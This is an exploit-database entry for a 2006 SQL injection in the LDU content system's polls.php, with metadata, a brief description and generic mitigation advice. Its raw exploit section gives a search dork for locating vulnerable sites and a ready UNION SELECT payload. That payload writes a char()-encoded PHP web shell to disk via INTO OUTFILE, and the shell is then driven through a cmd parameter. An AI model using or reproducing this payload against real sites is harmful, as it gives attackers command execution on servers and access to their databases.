header-logo
Suggest Exploit
vendor:
LDU
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LDU
Affected Version From: 8.x
Affected Version To: 8.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in LDU <= 8.x. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, execute system commands, and even gain access to the underlying server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# Dork    :  "Powered by LDU"

*******************************************************************************

[[SQL]]]------------------------------------------------------

### http://[target]/[path]/polls.php?id=

Example:

//
polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*

.php?cmd=[shell]
"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-30]